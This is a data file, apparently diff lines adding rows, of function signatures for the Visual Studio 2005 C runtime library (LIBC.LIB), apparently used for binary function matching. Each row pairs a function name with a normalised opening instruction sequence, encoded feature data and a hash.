+??YReplicator@@QAEAAV0@ABVDName@@@Z,"PUSH R32\nPUSH CONST\nMOV R32,0\nCALL CONST\nTEST R32,R32\nJCC CONST",Ju7hZXLoOkUAAAAAcug6RYD9In7iYeED4mHhA4D9In4AAAAAwnigTID9In5/RXV2gP0ifgAAAAAAAAAALJzyLHLoOkUAAAAAf0V1doD9In7g4nJZ4OJyWSbu4WUsnPIs,[],dc0a3053eda4d0e7e4500d5454526ebe4000b43c,VS2005,LIBC.LIB
+?getDataIndirectType@UnDecorator@@CA?AVDName@@ABV2@D0H@Z,"MOV R8,BYTE PTR DS:[R32]\nXOR R32,R32\nCMP R8,CONST\nSETL R8\nDEC R32\nAND R32,CONST\nMOVSX R32,R8\nADD R32,CONST",ac0GAL3JHzjMGxZlmRHaGL3JHzj2TnXZvx6uJfaBHB4AAAAAH0HKjeW/+YIAAAAA9k512ctoEkrLaBJKXmsdpeW/+YIAAAAAU3FSS4j7yphO/QsUHgHw0OW/+YIAAAAAN4Hzv/pqgpJTcVJLcO4a4VNxUksAAAAAy2gSSlvQFeBpzQYAEEJauvaBHB4AAAAAW9AV4GnNBgCvlcUV4zHIsVNxUksAAAAAvckfOBGmqIUAAAAAr5XFFWnNBgAAAAAAac0GAAf9iUHJYL5zzBsWZVvQFeAAAAAArptC2PZOddlpzQYAyWC+c58KjEsnD3USnwqMSwf9iUHO71Edac0GAL3JHzjSRCIqWYhPoR9Byo0AAAAAOBnpCq6bQtjt+ahkzu9RHeW/+YIAAAAAJw91El5rHaWfCoxL0kQiKi2Fz08/nLBRnwqMS15rHaU14QEtP5ywUdAnjs+/Hq4lLYXPT/aBHB7PpNjiTv0LFPpqgpKI+8qYy2gSSlvQFeDKL6CDFcobLgeDI6UAAAAANeEBLeW/+YIAAAAA0CeOzxBCWroAAAAAac0GAB4B8NDJYL5zyi+gg1vQFeAAAAAAmoWPlOMxyLEAAAAAD0Wo8/ZOddkAAAAAiPvKmHDuGuGahY+UnwqMSx4B8NBEb5jo7fmoZPZOddlpzQYAyWC+c58KjEsnD3US+mqCkr3JHzg4GekK5b/5gnOiGWEAAAAAKfvf4h9Byo0AAAAA9oEcHpkR2hgPRajzW9AV4FvQFeCvlcUVz6TY4pkR2hgPRajzJw91ElmIT6GfCoxLB/2JQRGmqIUAAAAAEaaohXOiGWEAAAAAnwqMS1mIT6Ep+9/iB4MjpeMxyLEAAAAAc6IZYQAAAAAAAAAAiPvKmHDuGuEVyhsuRG+Y6OW/+YIAAAAAgZC9IGnNBgA3gfO/r5XFFVvQFeAAAAAA,[],d6f3e5f5b2de664edc5347da0bc778047ab55f12,VS2005,LIBC.LIB
+??YDName@@QAEAAV0@D@Z,"PUSH CONST\nPUSH CONST\nMOV R32,0\nCALL CONST\nTEST R32,R32\nJCC CONST",Ju7hZWD+hOkAAAAAVe06Ml8iGcAAAAAA25roj18iGcAAAAAA25roj2D+hOkAAAAAXyIZwAAAAAAAAAAAUaffY1XtOjLMSjLR32U+m18iGcBSaOpbUmjqW1Gn32PbmuiPYP6E6V8iGcAAAAAAzEoy0Sbu4WXbmuiP,[],2a9d2c69e8136cc891f1800b3e353106614c7070,VS2005,LIBC.LIB
+___unDNameEx,"PUSH EBP\nMOV EBP,ESP\nSUB ESP,CONST\nMOV R32,DWORD PTR SS:[EBP+CONST]\nXOR R32,R32\nCMP R32,R32\nJCC CONST",ZuQHxQAAAAAAAAAArN+z5gAAAAAAAAAAI7VKMGbkB8Ws37Pm,[],66093de37376587e33f91dcf50ef45c6c22308b2,VS2005,LIBC.LIB
+?getLastChar@pDNameNode@@UBEDXZ,"MOV R32,DWORD PTR DS:[R32+CONST]\nTEST R32,R32\nJCC CONST",+OsIdgAAAAAAAAAAaNbbxwAAAAAAAAAALlW5/vjrCHZo1tvH,[],01247c8b92d1da2440ccbd61656d0fbdcc027919,VS2005,LIBC.LIB
+??0charNode@@QAE@D@Z,"PUSH R32\nMOV R32,R32\nCALL CONST\nMOV R8,BYTE PTR SS:[ESP+CONST]\nMOV DWORD PTR DS:[R32],0\nMOV BYTE PTR DS:[R32+CONST],R8\nMOV R32,R32\nPOP R32",eY5Q8AAAAAAAAAAA,TIWDOgAAAAAAAAAA,55c660cf923c51a6427c3f2b1afbc369b2727ca0,VS2005,LIBC.LIB
+?getExternalDataType@UnDecorator@@CA?AVDName@@ABV2@@Z,"PUSH EBP\nMOV EBP,ESP\nSUB ESP,CONST\nPUSH R32\nXOR R32,R32\nPUSH R32\nPUSH CONST\nMOV R32,0",JN9N9x2eDgAAAAAAHZ4OAAAAAAAAAAAA8ZPCLh2eDgAk3033,[],ccda7ba2726d1b3b8bd1ee7a374607bfbfb42b39,VS2005,LIBC.LIB
+?getString@DName@@QBEPADPADH@Z,"PUSH EBP\nMOV EBP,ESP\nPUSH R32\nPUSH R32\nMOV R32,R32\nCALL CONST\nTEST R32,R32\nJCC CONST",XqODJ5oNUqYAAAAALdTETQAAAAAAAAAAgMzdI6A3OqHkUryfqiN28EGMt59eo4MnQYy3nwAAAAAAAAAAl6zy43LoOkUAAAAAuyGU9s6wHJGqI3bwoDc6oXLoOkUAAAAAmg1SpoWy1B9y6DpFzrAckYWy1B9y6DpF5FK8n3d8CwgK7rcYcug6RYWy1B+AzN0jhbLUH0GMt58AAAAACu63GKA3OqGXrPLjd3wLCKA3OqGXrPLjTimBSJyGUTi7IZT2nIZROEGMt58t1MRNcug6RYWy1B9y6DpF,[],3164b5eb7b091f492cf58f7f7316a7a6094d4dae,VS2005,LIBC.LIB
+??YDNameNode@@QAEAAV0@PAV0@@Z,"MOV R32,R32\nMOV R32,DWORD PTR SS:[ESP+CONST]\nTEST R32,R32\nJCC CONST",9rrcoQAAAAAAAAAALlW5/ihdv6tW15slVtebJS5Vuf4AAAAALlW5/g4NJ9YNzMABDczAAS5Vuf4AAAAADg0n1va63KEAAAAATCnShPa63KEuVbn+KF2/q/a63KEAAAAA,[],7fd20ee8c6704cbc4e53e9881b9263a31d31d46c,VS2005,LIBC.LIB
+??0DNameStatusNode@@QAE@W4DNameStatus@@@Z,"PUSH R32\nMOV R32,R32\nCALL CONST\nMOV R32,DWORD PTR SS:[ESP+CONST]\nMOV DWORD PTR DS:[R32],0\nCMP CONST,CONST\nMOV DWORD PTR DS:[R32+CONST],R32\nJCC CONST",azyAlybu4WUNDA4glvVVaAAAAAAAAAAADQwOIJb1VWgAAAAAJu7hZZb1VWgAAAAA,[],86207242daede9fc1f33abb6261d84cb07bd958a,VS2005,LIBC.LIB
+??0pcharNode@@QAE@PBDH@Z,"PUSH DWORD PTR SS:[EBP+CONST]\nCALL CONST\nMOV R32,R32\nPOP R32\nCMP R32,R32\nJCC CONST",N1omtAAAAAAAAAAAsPm41uBFU/m7IZT2AxchYbshlPa7IZT2ShFj8zdaJrQAAAAAuyGU9uBFU/nFZRHMxWURzDdaJrRKEWPz4EVT+TdaJrQAAAAAuyGU9uBFU/mw+bjW,[],674fb22e70c1ff01162266bafa33019653e1ddfe,VS2005,LIBC.LIB
+?length@pcharNode@@UBEHXZ,"MOV R32,DWORD PTR DS:[R32+CONST]\nRETN",/zXMNQAAAAAAAAAA,[],96acfa69671b1374c0fc6b2da58913848e83d87f,VS2005,LIBC.LIB
+?getLastChar@DNameStatusNode@@UBEDXZ,"CMP DWORD PTR DS:[CONST+CONST],CONST\nSETNE R8\nDEC R32\nAND R8,BYTE PTR DS:[CONST]\nRETN",8gmq9AAAAAAAAAAA,[],c03a3ebf7b1ad526e6d508b5bfbe9a1a7306aba6,VS2005,LIBC.LIB
+?clone@DNameNode@@QAEPAV1@XZ,"PUSH CONST\nPUSH CONST\nMOV R32,R32\nCALL CONST\nTEST R32,R32\nJCC CONST",Ju7hZdua6I8AAAAA25rojzlafGAAAAAAJlIaFSbu4WXbmuiPTSGUiCbu4WUmUhoVOVp8YAAAAAAAAAAA25roj9ua6I8AAAAAJu7hZTlafGAAAAAA,[],06348e20015244cabf35f0ac947f7458bebec1a1,VS2005,LIBC.LIB
+?isValid@DName@@QBEHXZ,"MOV R32,DWORD PTR DS:[R32+CONST]\nAND R32,CONST\nJCC CONST",Ug74tAAAAAAAAAAA5wvfl1IO+LS7tlwsu7ZcLFIO+LRSzjaVUs42lQAAAAAAAAAA,[],46f958035e63150459c6bc0c972525d250ee10ef,VS2005,LIBC.LIB
+?getString@pDNameNode@@UBEPADPADH@Z,"MOV R32,DWORD PTR DS:[R32+CONST]\nXOR R32,R32\nCMP R32,R32\nJCC CONST",sEJ9ZPa63KEAAAAA3+oQTPa63KGwQn1ki4p5eva63KHf6hBM3+oQTPa63KHf6hBM9rrcoQAAAAAAAAAA,[],feacdb982f282fe010e5a8fd877f9e54e2a387a6,VS2005,LIBC.LIB
+?getLastChar@DName@@QBEDXZ,"PUSH R32\nPUSH R32\nMOV R32,R32\nXOR R32,R32\nCALL CONST\nTEST R32,R32\nJCC CONST",Ju7hZS5Vuf4AAAAAQwoWv7KZyKzGa/d9LlW5/qiZoIhy6DpFqJmgiC5Vuf4m7uFlcug6RbKZyKyGIMrjhiDK4z/DesUAAAAAxmv3fbKZyKyomaCIspnIrD/DesUAAAAAP8N6xQAAAAAAAAAA,[],8a487b3a65f7f3ed8b96e9c5a6c13d3cfb552110,VS2005,LIBC.LIB
+?doPchar@DName@@AAEXPBDH@Z,"PUSH R32\nMOV R32,R32\nPUSH R32\nMOV R32,DWORD PTR DS:[R32+CONST]\nMOV R32,R32\nAND R32,CONST\nCMP R32,CONST\nJCC CONST",FjgIIkvTtWm7tlwsKF2/q7YU/3IAAAAAM+HzTaxBBg4AAAAAu7ZcLLYU/3LfE8DlthT/cgAAAAAAAAAA3xPA5RY4CCLEnRrGJu7hZaxBBg4AAAAA3AYdq4HxcCSB8XAk4XJA3bYU/3K7tlwsxJ0axrYU/3IAAAAAgfFwJCbu4WUGXpTEu7ZcLADza+zcBh2rgfFwJCbu4WUz4fNNQUXQGwDza+wAAAAArEEGDrYU/3JBRdAbAPNr7Chdv6sAAAAAFjgIIkvTtWkWOAgiS9O1aShdv6sAAAAABl6UxKxBBg4AAAAA,[],74a1e77c7e3b2d9a6c2749ffc2ee426a6c46c531,VS2005,LIBC.LIB
+?getThisType@UnDecorator@@CA?AVDName@@XZ,"PUSH EBP\nMOV EBP,ESP\nSUB ESP,CONST\nPUSH CONST\nLEA R32,DWORD PTR SS:[EBP+CONST]\nCALL CONST\nPUSH R32\nPUSH CONST",xMeLigAAAAAAAAAA,U+59xgAAAAAAAAAA,8531c2403b5e68d86069e2793eb2f8d32fe91d81,VS2005,LIBC.LIB
+?getBasedType@UnDecorator@@CA?AVDName@@XZ,"PUSH EBP\nMOV EBP,ESP\nSUB ESP,CONST\nPUSH CONST\nCALL CONST\nPOP R32\nPUSH R32\nLEA R32,DWORD PTR SS:[EBP+CONST]",4oRyd6dn5Qa7tlwspLEiC2bYtocAAAAAu7ZcLKSxIgvNqPHGzajxxmbYtocAAAAAV3pHCaSxIgsAAAAAKB7VWpCwVwvTFPgC0xT4Ald6RwnihHJ3p2flBqSxIgsAAAAAkLBXC6SxIgsAAAAAZti2hwAAAAAAAAAA,[],28aa17d385f02b083327c9c74a1b07d572a10666,VS2005,LIBC.LIB
+_strcspn,"MOV R32,R32\nADD ESP,CONST\nPOP R32\nLEAVE\nRETN",FpE5erL1HPmqtBmvqrQZrxaROXqy9Rz5j+LO/f0DDRHVkOPrsvUc+QAAAAAAAAAA1ZDj64/izv0AAAAAEaatMY/izv0AAAAA/QMNERaROXoAAAAA,[],6b9d49b21c5f2d15ec50509c23e91c5e123075a7,VS2005,LIBC.LIB
+__filelengthi64,"PUSH CONST\nPUSH R32\nPUSH R32\nPUSH R32\nCALL CONST\nADD ESP,CONST\nCMP R32,R32\nMOV DWORD PTR SS:[EBP+CONST],R32",9HH2WU6gi7EAAAAAuyGU9gVI7VpXXsg1SGMrrgVI7VoAAAAAuwWxpakmifVIYyuuV17INQVI7VoAAAAAqSaJ9VdeyDW7IZT2PM5hIvRx9lm7BbGlBUjtWk6gi7EAAAAATqCLsQAAAAAAAAAAqMJwPfRx9lk8zmEi,[],6bc0b1d664a63d9d9175377604b43f032610982b,VS2005,LIBC.LIB
+_floor,CALL CONST\nFSTP QWORD PTR SS:[EBP+CONST]\nFLD QWORD PTR SS:[EBP+CONST]\nFCOMP QWORD PTR SS:[EBP+CONST]\nPOP R32\nPOP R32\nFSTSW R16\nSAHF,chKTE03UNygAAAAA3IFotsrch/S7tlwsytyH9E3UNygAAAAAgNjKxS6JAm4AAAAAu7ZcLIDYysW7tlws6/7prTUhd5zcgWi2u7ZcLMrch/SJmH8wgNjKxS6JAm4AAAAATdQ3KC6JAm4AAAAAiZh/MC6JAm4AAAAANSF3nFvQFeCA2MrFW9AV4IDYysVyEpMTLokCbgAAAAAAAAAA,[],b503578fae9ad464dcfa24f359e624f465de90cb,VS2005,LIBC.LIB
+__spawnv,"PUSH CONST\nPUSH DWORD PTR SS:[ESP+CONST]\nPUSH DWORD PTR SS:[ESP+CONST]\nPUSH DWORD PTR SS:[ESP+CONST]\nCALL CONST\nADD ESP,CONST\nRETN",HYNmwQAAAAAAAAAA,xJKmaEL41tYAAAAA8dbHQPQ42DYAAAAAo6qP8X3NIQcAAAAAcug6RSbu4WVy6DpFfc0hB+ekroJLfz7Wcug6RfQ42DYm7uFlJu7hZfQ42DYAAAAA9DjYNs7M3+RNBNpWRIa1AsSSpmjx1sdAHV2wR3LoOkVy6DpFS38+1n3NIQdeo4MnTQTaVnLoOkXFuzruEqKMefQ42DZEhrUCXqODJ4xJJ/AAAAAA56SugnLoOkUAAAAAxbs67nLoOkUAAAAAcug6RfQ42DYSoox5jEkn8HLoOkUAAAAAzszf5KOqj/HEkqZocug6RUFF0Bu5m+6quZvuqkFF0BsAAAAAQUXQG0L41tYAAAAAQvjW1gAAAAAAAAAA,d0c20b0edbcffcc71a7897b9629c008cb22b5ff5,VS2005,LIBC.LIB
+__handle_qnan2,"PUSH EBP\nMOV EBP,ESP\nPUSH R32\nPUSH R32\nFLD QWORD PTR SS:[EBP+CONST]\nFADD QWORD PTR SS:[EBP+CONST]\nCMP DWORD PTR DS:[0],0\nFSTP QWORD PTR SS:[EBP+CONST]",1GEWrwAAAAAAAAAAFPgOl7FD4brUYRavsUPhugAAAAAAAAAA,[],5696cc2cf977daeb5c11d4bfcd702221f6963530,VS2005,LIBC.LIB
+__handle_qnan1,"PUSH CONST\nMOV DWORD PTR DS:[0],CONST\nPUSH DWORD PTR SS:[EBP+CONST]\nCALL CONST\nFLD QWORD PTR SS:[EBP+CONST]\nPOP R32\nPOP R32\nPOP EBP",4xeAiAAAAAAAAAAABChN8gAAAAAAAAAAOWijNAQoTfLjF4CI,[],36b7cf301b867eeed5ab496d65d3d125ab235319,VS2005,LIBC.LIB
+__errcode,"MOVZX R32,R8\nAND CONST,CONST\nSHL R32,CONST\nRETN",1nzuDADh1msAAAAAB/2JQQDh1msAAAAA2M0EptjNBKbWfO4M1nzuDADh1msAAAAA2M0Ephjtp+cH/YlBGNEna9jNBKbWfO4MAOHWawAAAAAAAAAAGO2n5wAAAAAAAAAA1nzuDADh1msAAAAA2M0EptjNBKbWfO4M,[],f64349299da71106c7c8d7d5c66d3842ce73e34f,VS2005,LIBC.LIB
+__except2,"PUSH EBP\nMOV EBP,ESP\nSUB ESP,CONST\nPUSH DWORD PTR SS:[EBP+CONST]\nLEA R32,DWORD PTR SS:[EBP+CONST]\nPUSH R32\nPUSH DWORD PTR SS:[EBP+CONST]\nCALL CONST",zSa0dxbHVfB49fny4HBfyAAAAAAAAAAAePX58kukFfNy6DpFS6QV8wAAAAAAAAAAFsdV8EukFfNy6DpFcug6RUukFfPgcF/I,[],534386246f5b730401885e7db3ade6170d1da3f9,VS2005,LIBC.LIB
+__except1,"PUSH EBP\nMOV EBP,ESP\nSUB ESP,CONST\nPUSH DWORD PTR SS:[EBP+CONST]\nLEA R32,DWORD PTR SS:[EBP+CONST]\nPUSH R32\nPUSH DWORD PTR SS:[EBP+CONST]\nCALL CONST",cug6RUukFfNZ5kTbWeZE2wAAAAAAAAAAS6QV8wAAAAAAAAAAppPnI0ukFfNy6DpFFsdV8EukFfNy6DpFzSa0dxbHVfCmk+cj,[],834d03f45a80816eae85d32c60350a35580601dd,VS2005,LIBC.LIB
+__umatherr,"PUSH EBP\nMOV EBP,ESP\nSUB ESP,CONST\nPUSH DWORD PTR SS:[EBP+CONST]\nCALL CONST\nTEST R32,R32\nPOP R32\nMOV DWORD PTR SS:[EBP+CONST],R32",1D5wlwAAAAAAAAAA4sKZadQ+cJe5m+6qXoPhjQGHeDriwplpAYd4OgAAAAAAAAAAuZvuqtQ+cJcAAAAA,[],8db36a5f748a74b4dac18b964a46a63c57bad5f0,VS2005,LIBC.LIB
+__raise_exc,"MOV R32,DWORD PTR DS:[R32]\nSHR CONST,CONST\nAND R32,CONST\nSUB R32,0\nJCC CONST",4u06E0XfepAAAAAAD/03utk81ldfC5WurnFeqEUESPvoVavae7L2qZbs+M/KUXt0Rd96kJ6p+gIAAAAA2TzWV9jNBKZxf1DRU02B856p+gIAAAAAcX9Q0djNBKZxf1DRnqn6Ajo0q7iX2nuUD/03ulvQFeAP/Te62M0EptjNBKZxf1DRcug6ReSVS8r8irkacX9Q0djNBKZxf1DReCVwUq5xXqh6X59O/Iq5GuSVS8oAAAAARQRI+ycPdRJ7svapl9p7lGzaMs+X2nuUl9p7lMFaedZF33qQ2M0EptjNBKZxf1DRRd96kMFaedYAAAAAcX9Q0djNBKZ4JXBSbNoyz1NNgfMAAAAA/Iq5Gq5xXqgAAAAA2M0EptjNBKZ4JXBSOjSruFNNgfMAAAAAe7L2qScPdRJ7svapGDPoSdjNBKYYeljK2M0Epq5xXqh6X59OU02B88FaedYAAAAAwVp51gAAAAAAAAAAel+fTjYYCRfoVavaoIUubicPdRJ7svape7L2qScPdRJ7svapJw91EicPdRJ7svapW9AV4NjNBKYYeljKJw91EicPdRJ7svapGHpYylvQFeAP/Te6Jw91Epbs+M/KUXt06FWr2kLK9tvoVava8uW3yqCFLm4AAAAAylF7dJzhh9U79D2Gluz4z5zhh9U79D2G2M0EplvQFeAP/Te6O/Q9hlNNgfOX2nuUcug6Ra5xXqj8irkanOGH1VNNgfOX2nuUskgzCFvQFeAYM+hJ6FWr2vLlt8py6DpFO7vRo0XfepAAAAAAW9AV4FvQFeAP/Te66FWr2ju70aNy6DpFl9p7lOLtOhOX2nuU5JVLyicPdRJ7svapl9p7lEjR1p2X2nuUl9p7lJ6p+gJYK49WQsr2265xXqgAAAAAWCuPVp6p+gIAAAAAXwuVrtjNBKZxf1DRSNHWnUXfepAAAAAAW9AV4Nk81ldfC5WuRd96kK5xXqgAAAAArnFeqDYYCRfoVavaNhgJF0UESPvoVava,[],a69e124972eb057ad2dc8131830f5a55b27d6619,VS2005,LIBC.LIB
+__set_errno,"MOV R32,DWORD PTR SS:[ESP+CONST]\nCMP R32,CONST\nJCC CONST",32ZuS0akkGshh3ljAaF1swAAAAAAAAAAIYd5YwGhdbO7tlwsu7ZcLAGhdbNGpJBrRqSQawAAAAAAAAAARqSQawAAAAAAAAAA,[],3bd7636e83b355768cb8098415796f14e20678f6,VS2005,LIBC.LIB
+__handle_exc,"MOV R32,DWORD PTR SS:[EBP+CONST]\nFLD QWORD PTR DS:[R32]\nFSTP QWORD PTR SS:[EBP+CONST]\nFLD QWORD PTR SS:[EBP+CONST]\nFCOMP QWORD PTR DS:[0]\nFSTSW R16\nSAHF\nJCC CONST",Jw91EjFQP9AnD3USH4yPjScPdRIAAAAADb7lW3aPdFiXqcpKJw91EjFQP9CHMqs3xpt6opvkIMkAAAAAh6Ntfa8nV1wNvuVb66UKOtjNBKaW7PjPhzKrNzFQP9AAAAAAWNooOqrwJjWHo219iz8Fg8aYxvoNzMAB0kQiKi2GU57jSW3QDb7lW6WhGF2XqcpKMVA/0AAAAAAAAAAAl6nKSnaPdFgAAAAAdo90WFj1TBEAAAAADczAAdUpYtQAAAAAWPVMEa8nV1wAAAAAxpjG+nLoOkUm7uFlluz4z9jNBKY8Ewrg1Sli1HLoOkUm7uFlPBMK4CcPdRIAAAAAl6nKSqWhGF0AAAAALYZTnicPdRLSRCIqqvAmNZmwklVA1iTA0kQiKicPdRLFpmQP2M0Epi2GU54nD3USJu7hZZbs+M8AAAAAJw91Ei2GU54fjI+Nluz4z8pRe3Ry6DpFxaZkDyl6QkafQRFHcug6RcpRe3Qm7uFlQNYkwKWhGF0AAAAAn0ERRybu4WXiEx06Ju7hZcpRe3QAAAAAKXpCRibu4WXiEx06ylF7dMtn+C/c2BMhmbCSVaWhGF0AAAAArydXXCcPdRIAAAAA3NgTIctn+C8AAAAALYZTni2GU57SRCIqpaEYXVj1TBEAAAAAy2f4L5bs+M9y6DpFcug6RZvkIMmIvOmfqvAmNZmwklVA1iTAiLzpn5vkIMkAAAAApaEYXVj1TBEAAAAA4hMdOos/BYPGm3qi40lt0A2+5VtY2ig6m+QgyW+twNoAAAAAQNYkwKWhGF0AAAAApaEYXVj1TBEAAAAAJu7hZW+twNoAAAAAb63A2iSjmVzOQ0b9mbCSVaWhGF0AAAAAzkNG/SSjmVwAAAAAWNooOqrwJjVY2ig6JKOZXCcPdRIAAAAA,[],104ef059b24f83683ecda2b686a6a78a59ad30e5,VS2005,LIBC.LIB
+__mbsicoll,PUSH DWORD PTR DS:[0]\nPUSH -1\nPUSH DWORD PTR SS:[ESP+CONST]\nPUSH -1\nPUSH DWORD PTR SS:[ESP+CONST]\nPUSH CONST\nPUSH DWORD PTR DS:[0]\nCALL CONST,m5BQ/AAAAAAAAAAAyHOnCgAAAAAAAAAAtf9giJuQUPzIc6cK,[],adc6ed27ec401cd139e76208d86fd49c81cbaaea,VS2005,LIBC.LIB
+_vfwprintf,"PUSH EBP\nMOV EBP,ESP\nPUSH R32\nPUSH R32\nPUSH DWORD PTR SS:[EBP+CONST]\nCALL CONST\nPUSH DWORD PTR SS:[EBP+CONST]\nMOV R32,R32",H6TgTgAAAAAAAAAA,R7G+cE+LzApY2ig69UJzG0+LzAr7LfG4T4vMCgAAAAAAAAAAKHn2tk+LzAr7LfG4B49nGwAAAAAAAAAAWNooOljaKDoNzMAB+y3xuAePZxteToBoRyjsnAAAAAAAAAAADczAASh59rYAAAAAXk6AaAePZxv2nGVU9pxlVEco7JwAAAAAWNooOk+LzAr1QnMb,05a96cf4772b23c12eca375e11f20edba6df5bdd,VS2005,LIBC.LIB
+__XcptFilter,"AND DWORD PTR DS:[R32+CONST],0\nPUSH R32\nCALL R32\nPOP R32\nMOV R32,DWORD PTR SS:[EBP+CONST]\nMOV DWORD PTR DS:[0],R32\nOR R32,CONST\nJMP SHORT CONST",xKmfDeunqJ1/qv3RGaZm/z7kAmkAAAAA66eoneunqJ1/qv3R6FWr2j7kAmkba8ycf6r90ehVq9oZpmb/G2vMnK9eX+4AAAAAPuQCaa9eX+4AAAAAGaZm/z7kAmkAAAAA2x7uxpZbq2C7tlws6FWr2uhVq9oZpmb/Cwwu9T/DesUAAAAAGaZm/z7kAmkAAAAAmRk9iT/DesUAAAAAr15f7j/DesUAAAAAu7ZcLE79CxSZGT2J6FWr2uhVq9oZpmb/xJKmaD/DesUAAAAATv0LFMSSpmgb2DFXllurYD/DesUAAAAAG9gxVwsMLvUHtNutP8N6xQAAAAAAAAAA6FWr2uhVq9oZpmb/GaZm/z7kAmkAAAAAGaZm/z7kAmkAAAAA6FWr2uhVq9oZpmb/B7TbrX+q/dHEqZ8NGaZm/z7kAmkAAAAA6FWr2uhVq9oZpmb/RnzhzZZbq2DbHu7G,[],5ce67783a4cecf84ba97bc814b6f50faa8cf66bb,VS2005,LIBC.LIB
+_wcsftime,"ADD R32,R32\nPUSH R32\nCALL CONST\nTEST R32,R32\nPOP R32\nMOV DWORD PTR SS:[EBP+CONST],R32\nJCC CONST",Dx63J1AzVISFBAvCM35WuFAzVIQFfde4P8U16FAzVIQPHrcnQvjW1gAAAAAAAAAAhQQLwlAzVIQAAAAABX3XuFAzVIQ/xTXoUDNUhAAAAAAAAAAAD/yJg0L41tYzfla4,[],329421f85eb2f9bcd14fa6d95e185ed39852dfbc,VS2005,LIBC.LIB
+_localeconv,"MOV R32,DWORD PTR DS:[0]\nRETN",DcG51AAAAAAAAAAA,[],a84f246eb814acab8074ce2b2fff3668005d5e94,VS2005,LIBC.LIB
+__putws,"INC R32\nPUSH R32\nPUSH R32\nINC R32\nCALL CONST\nPOP R32\nCMP R16,R16\nPOP R32",XqODJxsuW38AAAAABHk2IiPI2A4m7uFlGy5bfwR5NiK2RxK8FHZdahsuW38AAAAAtkcSvCPI2A5eo4MnJu7hZSPI2A4AAAAAI8jYDgAAAAAAAAAA,[],c0e2e107358ec7c6b16f083297b739ab02a22a72,VS2005,LIBC.LIB
+__CIexp,FSTCW WORD PTR SS:[EBP+CONST]\nCALL CONST\nCALL CONST\nPOP R32\nLEAVE\nRETN,sLk6DkwX6kb5irn/TBfqRgAAAAAAAAAA+Yq5/0wX6kYAAAAA/MSgqrC5Og4AAAAA,[],e5b8e4d025f2ee4665595937451ba4e20246acc0,VS2005,LIBC.LIB
+_exp,"PUSH DWORD PTR SS:[EBP+CONST]\nCALL CONST\nMOVZX R32,R16\nCMP R32,CONST\nPOP R32\nJCC CONST",DczAATlafGAAAAAA/MSgqmVkTcEAAAAA3xPA5R2cRa4Op/IMXqODJ98TwOUAAAAADqfyDHLoOkUl334QZWRNwd8TwOUNzMABJd9+EB2cRa5eo4MnHZxFribu4WUAAAAADczAASbu4WUAAAAAJu7hZTlafGAAAAAAOVp8YAAAAAAAAAAA/MSgqvzEoKoAAAAAcug6RR2cRa4NzMAB,[],63856cae100538eb9db49b3b502b74626ff8c614,VS2005,LIBC.LIB
+_fgetws,"PUSH DWORD PTR SS:[EBP+CONST]\nCALL CONST\nMOVZX R32,R16\nCMP R32,CONST\nPOP R32\nJCC CONST",DczAATlafGAAAAAA3xPA5R2cRa4Op/IMXqODJ98TwOUAAAAADqfyDHLoOkUl334QDczAASbu4WUAAAAAJd9+EB2cRa5eo4Mn+M0L998TwOUNzMABHZxFribu4WUAAAAAJu7hZTlafGAAAAAAOVp8YAAAAAAAAAAAcug6RR2cRa4NzMAB,[],68191289283826e7c6259796908ad42dd249849a,VS2005,LIBC.LIB
+??_L@YGXPAXIHP6EX0@Z1@Z,"MOV R32,DWORD PTR SS:[EBP+CONST]\nMOV R32,R32\nCALL DWORD PTR SS:[EBP+CONST]\nADD R32,DWORD PTR SS:[EBP+CONST]\nMOV DWORD PTR SS:[EBP+CONST],R32\nINC DWORD PTR SS:[EBP+CONST]\nJMP SHORT CONST",g65DXpkLeIPs9/trPICQmIOuQ14AAAAAmQt4gwAAAAAAAAAA7Pf7a4OuQ14AAAAA,[],d1d7592b846cdd649be405d523ccbff873897947,VS2005,LIBC.LIB
+_WinMainCRTStartup,"PUSH CONST\nCALL CONST\nPOP R32\nMOV DWORD PTR SS:[EBP+CONST],R32\nCALL CONST\nCALL DWORD PTR DS:[0]\nMOV DWORD PTR DS:[0],R32\nCALL CONST",lO+TPQAAAAAAAAAAXWelNffYzzAT7LDQE+yw0Go60bWWfJuv99jPMGo60bWWfJuvlnybr5Tvkz0AAAAAajrRtQAAAAAAAAAA,[],240ca12a1cdd6694ac0d31b9192ebb5cd586d249,VS2005,LIBC.LIB
+__wmkdir,"PUSH R32\nCALL CONST\nPOP R32\nOR R32,CONST\nRETN",Ju7hZXLoOkUAAAAAcug6RVLONpUIpA1ACKQNQAAAAAAAAAAAmort0Cbu4WWVUBzMUs42lQAAAAAAAAAAlVAczHLoOkUAAAAA,[],afc8aebdb04d561c2a41ffdcbeb265020898cc35,VS2005,LIBC.LIB
+__cscanf,"LEA R32,DWORD PTR SS:[ESP+CONST]\nPUSH R32\nPUSH DWORD PTR SS:[ESP+CONST]\nCALL CONST\nPOP R32\nPOP R32\nRETN",NQ7aigAAAAAAAAAA,j+LO/deZsVfYzQSm4/Bxzo6pvhPfE8Dl2M0EpteZsVdYK49WJAPDnXyzn+ZpF9xep+n+4o/izv0AAAAAYlEym4/izv0AAAAAac0GAFj6IxC7tlwsCwn5c46pvhPfE8Dl7pp9kdBnlhC7tlwshPPo5o6pvhPfE8DlJAPDnXyzn+ZpF9xefLOf5lj6IxBBjXwb662XHtJEIioAAAAAcug6RVj6IxBBjXwb4Y/fUnOiGWGchlE4u7ZcLFhZdp9O/QsU3xPA5dJEIiqOqb4Tu7ZcLN94jLYg6G88jqm+E7u2XCwAAAAAIOhvPEJM1QIAAAAAnIZROBaIDF0oXb+rj9F+794uAVEAAAAAKF2/qxaIDF0AAAAAFogMXZyGUTgAAAAA1MwuW+cL35dO/QsUWCuPVu6afZEAAAAAtJcSD9JEIioAAAAAQkzVAk79CxROasPO0GeWEE79CxROasPO0kQiKru2XCwuVgh0u7ZcLEGNfBu7tlwsTmrDzs6SbFdO/QsU0kQiKrmLsMxqaTi0tMYrI4ejbX2oT2vprZMNRWJRMpvYzQSmLlYIdLu2XCwAAAAATv0LFNhHjc7UzC5bu7ZcLGvgci5r4HIuamk4tLmLsMwAAAAA09EzNru2XCx2/5B9qE9r6bSXEg8nD3USUnPiqihdv6sAAAAAaRfcXnLoOkUAAAAATv0LFLshlPZO/QsU0kQiKicPdRK7tlwsTv0LFOcL35fUzC5bEaq0eHOiGWFeo4Mna+ByLtJEIioAAAAAu7ZcLCQDw527tlws1MwuW5N/CxK7tlwsu7ZcLCQDw50kA8OduyGU9icPdRJo50nZJAPDnfmsD9DCgPP8aOdJ2ScPdRIAAAAAJw91EoNLcOQnD3USwoDz/HLoOkUAAAAAJw91EvzEoKrc2BMhJw91EoGGgcI6Rpj56kS0E